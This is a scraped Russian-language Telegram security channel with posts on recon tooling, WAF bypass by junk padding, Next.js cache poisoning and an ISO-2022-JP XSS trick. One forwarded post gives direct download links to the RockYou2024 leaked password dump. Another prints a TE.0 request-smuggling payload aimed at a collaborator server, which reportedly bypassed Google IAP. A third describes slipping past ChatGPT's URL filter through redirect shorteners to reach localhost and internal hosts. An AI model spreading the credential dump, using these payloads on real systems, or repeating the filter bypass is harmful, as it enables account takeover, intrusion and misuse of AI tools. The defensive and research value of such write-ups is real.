SHADOW:Group
11.6K subscribers
106 photos
47 videos
19 files
821 links
Чат: @shadow_chat_tg

Рекламу не размещаю.

Админ - @shdwpwn
Download Telegram
🔎Собираем поддомены и IP в RSECloud

Недавно нашел новый ресурс, под названием RSECloud, который позволяет собирать поддомены и IP'шники организации по домену или имени организации. Работает как в вебе, так и через API.

Чтобы удобно прикрутить его к своей автоматизации накидал небольшой скрипт на GO, который предполагает 3 варианта использования:

Сбор поддоменов:
rsescan -d example.com -key YOUR_API_KEY


Сбор IP'шников по домену:
rsescan -d example.com -cn -key YOUR_API_KEY


Сбор IP'шников по имени организации:
rsescan -so "Organization Name" -key YOUR_API_KEY


Для получения API ключа нужно просто пройти регистрацию по почте. Для всех желающих залил скрипт на гитхаб.

Ссылка на RSECloud
Ссылка на скрипт

#web #recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍28🔥6🤯1
This media is not supported in your browser
VIEW IN TELEGRAM
⌨️ Обход WAF через большое количество символов

Ранее я уже рассказывал о том, что для HTTP-запросов, содержащих тело запроса (например, POST, PUT, PATCH и т.д.), часто можно обойти WAF, просто добавив мусорные данные в начало запроса. Когда запрос дополняется этими ненужными данными, WAF обработает до X КБ запроса и проанализирует его, но все, что превышает пределы WAF, пройдет мимо.

На недавнем NahamCon вышел целый доклад на эту тему с подробным разбором и необходимыми значениями X КБ для обхода различных популярных WAF. Видео доклада, описание и расширение для вставки мусорных данных в Burp представлено по ссылкам ниже.

Ссылка на видео
Ссылка на GitHub

#web #waf #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20🔥11😢1
SHADOW:Group
​​🥇Pentest Award возвращается Ребята из Awillix анонсировали прием заявок на ежегодную премию для пентестеров - Pentest Award. Вы можете громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями…
Кстати, на днях согласовал с вендором публикацию рассказа об одном из отчетов, чтобы закинуть заявку на Pentest Award. В итоге статья увидела свет и была отправлена, хоть и в довольно урезанном виде. Если тоже хотите поучаствовать, чтобы выиграть призы или просто поделиться с комьюнити своими интересными находками, то у вас еще есть время до 23.06.
🔥15👍2🤯1
Forwarded from OFFZONE
This media is not supported in your browser
VIEW IN TELEGRAM
®️ Запускаем call for papers!

Пятый OFFZONE пройдет 22–23 августа в Москве, в Культурном центре ЗИЛ.

В этом году у нас еще больше зон для выступлений: добавились AI.Zone и Threat.Zone.
Ждем доклады на самые разные темы: open-source, применение AI/ML в кибербезопасности, уязвимости в парсерах, пентест Wi-Fi и не только. Не бойтесь предложить что-то свое :)

Спикеры, которые пройдут отбор, получат: бесплатные проходки на конфу и Speaker party, наш мерч, а также другие плюшки в зависимости от зоны.

Присылайте заявки на доклады до 12 июля. 

Узнать больше и подать заявку
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥5😁1🤯1
🔃 Редирект в ChatGPT

Очередному исследователю не заплатили и он поделился рассказом о том, что ChatGPT не может получать доступ к определенным веб-сайтам, однако фильтрация некорректно обрабатывает HTTP-перенаправления. Вы можете использовать любой сокращатель ссылок и обойти их проверки.

Более того, это также работает для ссылок типа https://localhost:<порт для сканирования>/ и внутренних доменов OpenAI.

Однако, по мнению компании, это не угроза безопасности.

#web #ssrf
Please open Telegram to view this post
VIEW IN TELEGRAM
👍29😁6🤯2😢1
SHADOW:Group
Кстати, на днях согласовал с вендором публикацию рассказа об одном из отчетов, чтобы закинуть заявку на Pentest Award. В итоге статья увидела свет и была отправлена, хоть и в довольно урезанном виде. Если тоже хотите поучаствовать, чтобы выиграть призы или…
На Pentest Award продлили прием заявок аж до 14 июля. Меньше всего конкуренции в номинации «Ловись рыбка: за самый оригинальный фишинг или попытку засоциалить сотрудников», поэтому, если у вас имеются интересные кейсы, есть высокий шанс оказаться среди номинантов.
👍9🔥2😁1😢1
💀 Про Next.js и отравление кэша

1️⃣ При извлечении данных для страниц SSR (рендеринга на стороне сервера) добавление заголовка x-middleware-prefetch приводит к получению пустого объекта JSON {} в качестве ответа. При наличии CDN или системы кэширования этот пустой ответ потенциально может быть кэширован, в зависимости от конфигурации правил кэширования, что делает целевую страницу непрактичной, а ее содержимое недоступным и получается некая разновидность DOS'а через отравление кэша.

2️⃣ Использование React Component Server (RSC) и отправка заголовка Rsc: 1, может привести к отравлению кэша и вернет RSC React вместо исходного содержимого. Успешность также зависит от CDN и его правил кэширования.

3️⃣ При определенных условиях можно перезаписать код состояния через значение заголовка x-invoke-status, непосредственно указанного в запросе и вызвать/вернуть страницу ошибки. Как правило, CDN и системы кэширования настроены так, чтобы не кэшировать коды ошибок HTTP. Однако можно указать код 200 для согласования с правилами кэширования и эффективно “принудительно” кэшировать страницу с ошибкой.

Более подробно про каждый из способов, а также некоторые советы как нафармить денег при общении с триажерами доступны в оригинальном ресерче по ссылке.

#web #cache #dos
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14🔥5🤯1
Forwarded from Похек (Сергей Зыбнев)
RockYou2024
Архив весит 45 гб
Распакованный 156 гб

Загрузил на свой S3. Скорость не лучшая, но точно не отвалиться загрузка
https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip

Яндекс Диск. Тут скорость заметно быстрее
https://disk.yandex.ru/d/1spMBmxcEnN95g

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
👍34🤯1
Forwarded from BI.ZONE Bug Bounty
😆 Прокачали BI.ZONE Bug Bounty для успешного багхантинга

Мы завершили первый этап редизайна платформы и телеграм-канала!

Что нового:

🔵Изменили стилевое и цветовое оформление. Визуальная часть стала более атмосферной и тематической.

🔵Внедрили систему тегов. Теперь легко отфильтровать программы по нужным критериям. Например, кто отвечает за триаж ­— компания или наши эксперты, можно ли перевести выплату на благотворительность.

🔵Добавили метрику для программы. Появилась возможность посмотреть среднее время обработки отчета в рамках каждой программы. Учитывается период с момента отправки репорта до получения информации о его финальном статусе.

Кстати, платформа переехала и теперь располагается тут — https://bugbounty.bi.zone.

Этот релиз — первый из запланированных. Поэтому расскажите нам о своих пожеланиях и поделитесь идеями, чтобы мы смогли их учесть в следующих обновлениях.

А пока можете изучить платформу ;)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥4😁3🤔2
🪟XSS на веб-сайтах с отсутствующей информацией о кодировке

Злоумышленник может использовать кодировку символов ISO-2022-JP для внедрения произвольного кода JavaScript на веб-сайтах, где отсутствует информация о кодировке HTML страницы.

Подробнее о том, как это работает и почему может приводить к XSS читайте в блоге по ссылке.

#web #xss
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20
Forwarded from PurpleBear (Vadim Shelest)
TE.0 HTTP Request Smuggling

Новая техника эксплуатации HTTP Request Smuggling представлена в блоге Bugcrowd

Суть TE.0 такая же как у CL.0 только в данном случае фронт принимает, а бэкэнд игнорирует заголовок Transfer-Encoding. Кто бы мог подумать, что в мире найдутся сервера обрабатывающие запрос, который начинается с number + newline😎

OPTIONS / HTTP/1.1
Host: {HOST}
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Transfer-Encoding: chunked
Connection: keep-alive

50
GET <http://our-collaborator-server/> HTTP/1.1
x: X
0
EMPTY_LINE_HERE
EMPTY_LINE_HERE


Такие нашлись у GCP load balancer'ов, эксплуатация TE.0 позволила обойти Google IAP (Identity-Aware Proxy) и получить доступ к ресурсам за этой проксей с байпасом механизмов аутентификации и авторизации, за репорт баги Google выплатили исследователям $8.5k

Особенности эксплуатации TE.0:
Значение chunk length должно быть в hex number в соответствии с HTTP/1.1 RFC
2 EMPTY_LINE_HERE в конце последнего чанка запроса
Использование различных методов при отправке пейлоада (в кейсе с GCP успешно отработал OPTIONS)
👍14🔥6😢1
This media is not supported in your browser
VIEW IN TELEGRAM
🎉 Розыгрыш билетов на OFFZONE

Да свершится великий рандом! Я разыграю ДВА БИЛЕТА на одну из самых ожидаемых конференций года - OFFZONE.

Как принять участие:
- Быть подписанным на канал
- Нажать кнопку "Участвую!" под этим постом

Бот случайным образом выберет двух счастливчиков среди тех, кто выполнит все условия!

Сроки:
Розыгрыш продлится до 29.07.2024, а победители будут объявлены на следующий день.

Не упустите свой шанс стать частью OFFZONE! Удачи всем участникам!

#offzone
🔥14👍8
Forwarded from STEIN: ИБ, OSINT
📖 AlphaBay: Как ошибка в Opsec привела к поимке «короля» даркнета 

Alphabay — огромный даркнет-маркетплейс, стал символом эпохи «темного» интернета. Его создание - результат стремления к анонимности, которое в итоге привело к катастрофическим последствиям.

Alphabay предлагал убежище для преступников, где они могли продавать наркотики, оружие и украденные данные. Но за анонимностью скрывался Александр Казес - тот самый Alpha02, администратор сайта, только он не учёл важность Opsec - что его и погубило.


teletype.in/@secur_researcher/opsec

История Alphabay - наглядный пример того, как одна ошибка может перечеркнуть всё, под катом вас ждёт увлекательная история, наполненная сюжетными переворотами.

#OPSEC #OSINT | 😈 @secur_researcher
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14🔥8😁1
Forwarded from Machete Hack
Как_отсутствие_одной_проверки_привело_к_двум_логическим_уязвимостям.pdf
713.3 KB
Пара кейсов с БагБаунти ☄️

Решил поделиться парой найденных багов, которые были подтверждены около года назад и уже исправлены.

В будущем планирую также выкладывать подобные посты, так как практические кейсы всегда позволяют подчерпнуть для себя чего-то нового.

Приятного прочтения ! 🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥46👍3